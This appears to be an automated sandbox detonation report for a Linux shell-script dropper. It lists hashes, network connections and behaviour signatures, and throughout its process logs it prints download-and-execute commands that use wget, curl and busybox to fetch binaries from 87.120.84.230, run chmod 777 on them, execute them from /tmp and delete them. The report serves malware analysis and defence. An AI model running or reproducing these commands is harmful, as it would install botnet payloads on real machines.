
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/chmod

[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH

[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/rm

[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/chmod

[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6

[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/rm

[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/wget

[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/chmod

[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/rm

[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/wget

[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/chmod

[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h

[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/rm

[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/wget

[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/chmod

[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae

[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/rm

[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/wget

[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/chmod

[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd

[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/rm

[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/wget

[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/chmod

[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20

[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/rm

[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/wget

[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/chmod

[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i

[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/rm

[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/wget

[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/chmod

[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u

[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/rm

[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/wget

[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/chmod

[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv

[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/rm

[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/wget

[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/chmod

[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd

[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/rm

[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/wget

[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/chmod

[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo

[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/rm

[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/wget

[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/chmod

[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj

[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/rm

[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/wget

[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/chmod

[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC

[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/rm

[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/wget

[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/chmod

[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH

[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/rm

[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/chmod

[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6

[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/rm

[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 03:22

Reported

2024-10-28 03:25

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

22s

Max time network

128s

Command Line

[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A
N/A /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u N/A
N/A /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv N/A
N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo N/A
N/A /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj N/A
N/A /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC N/A
N/A /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH N/A
N/A /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 N/A
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A
N/A /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u N/A
N/A /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv N/A
N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo N/A
N/A /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj N/A
N/A /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC N/A
N/A /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH N/A
N/A /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /usr/bin/curl N/A
File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /usr/bin/curl N/A
File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /usr/bin/curl N/A
File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /usr/bin/curl N/A
File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /usr/bin/curl N/A
File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /usr/bin/curl N/A
File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /usr/bin/curl N/A
File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /usr/bin/curl N/A
File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /usr/bin/curl N/A
File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /usr/bin/curl N/A
File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /usr/bin/curl N/A
File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /usr/bin/curl N/A
File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /usr/bin/curl N/A
File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /usr/bin/curl N/A
File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /usr/bin/curl N/A
File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /usr/bin/curl N/A
File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /usr/bin/curl N/A
File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /usr/bin/curl N/A
File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /usr/bin/curl N/A
File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /usr/bin/curl N/A
File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /usr/bin/curl N/A
File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /usr/bin/curl N/A
File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /usr/bin/curl N/A
File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /usr/bin/curl N/A
File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /usr/bin/curl N/A
File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /usr/bin/curl N/A
File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /usr/bin/curl N/A
File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /usr/bin/curl N/A

Processes

/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh

[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/chmod

[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/rm

[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/wget

[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/chmod

[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h

[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/rm

[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/wget

[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/chmod

[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae

[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/rm

[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/wget

[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/chmod

[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd

[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/rm

[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/wget

[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/chmod

[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20

